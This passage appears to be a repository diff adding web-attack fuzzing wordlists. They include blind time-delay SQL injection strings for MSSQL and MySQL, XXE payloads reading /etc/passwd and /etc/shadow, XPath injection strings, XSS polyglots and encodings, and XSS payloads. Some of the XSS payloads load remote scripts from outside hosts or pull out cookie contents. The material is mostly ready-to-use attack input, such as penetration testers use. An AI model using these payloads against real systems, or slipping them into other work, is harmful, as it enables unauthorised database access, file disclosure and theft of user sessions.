",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

40
attack/sql-injection/payloads-sql-blind/payloads-sql-blind-MSSQL-WHERE.txt Normal file
View file

@ -0,0 +1,40 @@
waitfor delay '0:0:20' /*
waitfor delay '0:0:20' --
' waitfor delay '0:0:20' /*
' waitfor delay '0:0:20' --
" waitfor delay '0:0:20' /*
" waitfor delay '0:0:20' --
) waitfor delay '0:0:20' /*
) waitfor delay '0:0:20' --
)) waitfor delay '0:0:20' /*
)) waitfor delay '0:0:20' --
))) waitfor delay '0:0:20' /*
))) waitfor delay '0:0:20' --
)))) waitfor delay '0:0:20' /*
)))) waitfor delay '0:0:20' --
))))) waitfor delay '0:0:20' --
)))))) waitfor delay '0:0:20' --
') waitfor delay '0:0:20' /*
') waitfor delay '0:0:20' --
") waitfor delay '0:0:20' /*
") waitfor delay '0:0:20' --
')) waitfor delay '0:0:20' /*
')) waitfor delay '0:0:20' --
")) waitfor delay '0:0:20' /*
")) waitfor delay '0:0:20' --
'))) waitfor delay '0:0:20' /*
'))) waitfor delay '0:0:20' --
"))) waitfor delay '0:0:20' /*
"))) waitfor delay '0:0:20' --
')))) waitfor delay '0:0:20' /*
')))) waitfor delay '0:0:20' --
")))) waitfor delay '0:0:20' /*
")))) waitfor delay '0:0:20' --
'))))) waitfor delay '0:0:20' /*
'))))) waitfor delay '0:0:20' --
"))))) waitfor delay '0:0:20' /*
"))))) waitfor delay '0:0:20' --
')))))) waitfor delay '0:0:20' /*
')))))) waitfor delay '0:0:20' --
")))))) waitfor delay '0:0:20' /*
")))))) waitfor delay '0:0:20' --

90
attack/sql-injection/payloads-sql-blind/payloads-sql-blind-MySQL-INSERT.txt Normal file
View file

@ -0,0 +1,90 @@
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23

18
attack/sql-injection/payloads-sql-blind/payloads-sql-blind-MySQL-ORDER_BY.txt Normal file
View file

@ -0,0 +1,18 @@
,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23

45
attack/sql-injection/payloads-sql-blind/payloads-sql-blind-MySQL-WHERE.txt Normal file
View file

@ -0,0 +1,45 @@
and 0=benchmark(3000000,MD5(1))%20/*
and 0=benchmark(3000000,MD5(1))%20--
and 0=benchmark(3000000,MD5(1))%20%23
' and 0=benchmark(3000000,MD5(1))%20/*
' and 0=benchmark(3000000,MD5(1))%20--
' and 0=benchmark(3000000,MD5(1))%20%23
" and 0=benchmark(3000000,MD5(1))%20/*
" and 0=benchmark(3000000,MD5(1))%20--
" and 0=benchmark(3000000,MD5(1))%20%23
) and 0=benchmark(3000000,MD5(1))%20/*
) and 0=benchmark(3000000,MD5(1))%20--
) and 0=benchmark(3000000,MD5(1))%20%23
)) and 0=benchmark(3000000,MD5(1))%20/*
)) and 0=benchmark(3000000,MD5(1))%20--
)) and 0=benchmark(3000000,MD5(1))%20%23
))) and 0=benchmark(3000000,MD5(1))%20/*
))) and 0=benchmark(3000000,MD5(1))%20--
))) and 0=benchmark(3000000,MD5(1))%20%23
)))) and 0=benchmark(3000000,MD5(1))%20/*
)))) and 0=benchmark(3000000,MD5(1))%20--
)))) and 0=benchmark(3000000,MD5(1))%20%23
') and 0=benchmark(3000000,MD5(1))%20/*
') and 0=benchmark(3000000,MD5(1))%20--
') and 0=benchmark(3000000,MD5(1))%20%23
") and 0=benchmark(3000000,MD5(1))%20/*
") and 0=benchmark(3000000,MD5(1))%20--
") and 0=benchmark(3000000,MD5(1))%20%23
')) and 0=benchmark(3000000,MD5(1))%20/*
')) and 0=benchmark(3000000,MD5(1))%20--
')) and 0=benchmark(3000000,MD5(1))%20%23
")) and 0=benchmark(3000000,MD5(1))%20/*
")) and 0=benchmark(3000000,MD5(1))%20--
")) and 0=benchmark(3000000,MD5(1))%20%23
'))) and 0=benchmark(3000000,MD5(1))%20/*
'))) and 0=benchmark(3000000,MD5(1))%20--
'))) and 0=benchmark(3000000,MD5(1))%20%23
"))) and 0=benchmark(3000000,MD5(1))%20/*
"))) and 0=benchmark(3000000,MD5(1))%20--
"))) and 0=benchmark(3000000,MD5(1))%20%23
')))) and 0=benchmark(3000000,MD5(1))%20/*
')))) and 0=benchmark(3000000,MD5(1))%20--
')))) and 0=benchmark(3000000,MD5(1))%20%23
")))) and 0=benchmark(3000000,MD5(1))%20/*
")))) and 0=benchmark(3000000,MD5(1))%20--
")))) and 0=benchmark(3000000,MD5(1))%20%23

66
attack/xml/xml-attacks.txt Normal file
View file

@ -0,0 +1,66 @@
-
' or ''='
' or '1'='1
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/shadow"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:/boot.ini"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[' or 1=1 or ''=']]></foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://xss.rocks/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://xss.rocks/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
"<xml SRC=""xsstest.xml"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
$
%
&apos;XoiZR
&lt;% Tnn96 %&gt;
&lt;%= Tnn96 %&gt;
&lt;? Tnn96 ?&gt;
&lt;?Tnn96 ?&gt;
&lt;Tnn96&gt;
&quot;XoiZR
(Tnn96)
*
*/*
/
//
//*
:
;
@
@*
[Tnn96]
]>
{{= Tnn96}}
{{Tnn96}}
{= Tnn96}
{Tnn96}
+
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///etc/passwd">
<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:/boot.ini">
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof>
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
<name>','')); phpinfo(); exit;/*</name>
0
0.00005
0.1
0.9
1
-1
1.7976931348623157e+308
5e-10
5e-324
count(/child::node())
false
null
true
x' or 1=1 or 'x'='y
x' or name()='username' or 'x'='y

13
attack/xpath/xpath-injection.txt Normal file
View file

@ -0,0 +1,13 @@
' or '1'='1
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
@*
count(/child::node())
x' or name()='username' or 'x'='y
' and count(/*)=1 and '1'='1
' and count(/@*)=1 and '1'='1
' and count(/comment())=1 and '1'='1

32
attack/xss/XSSPolyglot.txt Normal file
View file

@ -0,0 +1,32 @@
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
/*-/*`/*\`/*'/*"/**/
(/* */oNcliCk=alert() )
//%0D%0A%0D%0A//
</stYle/</titLe/</teXtarEa/</scRipt/--!>
\x3csVg/<sVg/oNloAd=alert()//>\x3e
<input type='text' value='jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e'></input>
<input type=text value=jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e></input>
<img border=3 alt=jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e>
<a href="jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e">click me</a>
<math xlink:href="jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e">click me</math>
<iframe src="jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e"></iframe>
<!--jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e-->
<style>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</style>
<textarea>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</textarea>
<div>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</div>
var str = "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e";
var str = 'jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e';
<script>//jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</script>
<script>/*jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e*/</script>
</script><script src="https://static.jsbin.com/js/render/edit.js?3.35.11"></script><script>jsbinShowEdit && jsbinShowEdit({"static":"https://static.jsbin.com","root":"https://jsbin.com"});</script><script>
setTimeout(location.search.slice(1));
jaVasCript:/-/%60/%5C%60/'/%22//(/%20*/oNcliCk=alert()%20)//%250D%250A%250D%250A//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E%3CsVg/%3CsVg/oNloAd=alert()//%3E%3E
var data = "jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e";document.documentElement.innerHTML = data;
var data = "jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e";document.head.outerHTML = data;
var data = "jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e";document.write(data);document.close();

70
attack/xss/all-encodings-of-lt.txt Normal file
View file

@ -0,0 +1,70 @@
<
%3C
&lt
&lt;
&LT
&LT;
&#60
&#060
&#0060
&#00060
&#000060
&#0000060
&#60;
&#060;
&#0060;
&#00060;
&#000060;
&#0000060;
&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
&#x3c;
&#x03c;
&#x003c;
&#x0003c;
&#x00003c;
&#x000003c;
&#X3c
&#X03c
&#X003c
&#X0003c
&#X00003c
&#X000003c
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#x3C
&#x03C
&#x003C
&#x0003C
&#x00003C
&#x000003C
&#x3C;
&#x03C;
&#x003C;
&#x0003C;
&#x00003C;
&#x000003C;
&#X3C
&#X03C
&#X003C
&#X0003C
&#X00003C
&#X000003C
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
\x3c
\x3C
\u003c
\u003C

22
attack/xss/default-javascript-event-attributes.txt Normal file
View file

@ -0,0 +1,22 @@
onAbort
onBlur
onChange
onClick
onDblClick
onDragDrop
onError
onFocus
onKeyDown
onKeyPress
onKeyUp
onLoad
onMouseDown
onMouseMove
onMouseOut
onMouseOver
onMouseUp
onMove
onReset
onResize
onSelect
onSubmit

164
attack/xss/xss-other.txt Normal file
View file

@ -0,0 +1,164 @@
'
<font style='color:expression(alert('XSS'))'>
' onmouseover=alert(/Black.Spook/)
' or 2=2
"
" or 202
";eval(unescape(location))//# %0Aalert(0)
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
"><iframe%20src="http://google.com"%%203E
"><img src=x onerror=prompt(1);>
"><img src=x onerror=window.open('https://www.google.com/');>
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E
%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E
&#x61;l&#x65;rt&#40;1)
&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;
&lt;IMG """><SCRIPT>alert("XSS")</SCRIPT>">
&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;
&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;
&lt;SCRIPT SRC=//xss.rocks/.j>
'); alert('XSS
\";alert('XSS');//
<%<!--'%><script>alert(1);</script -->
<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74>
<--`<img/src=` onerror=alert(1)> --!>
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
<<scr\0ipt/src=http://xss.com/xss.js></script
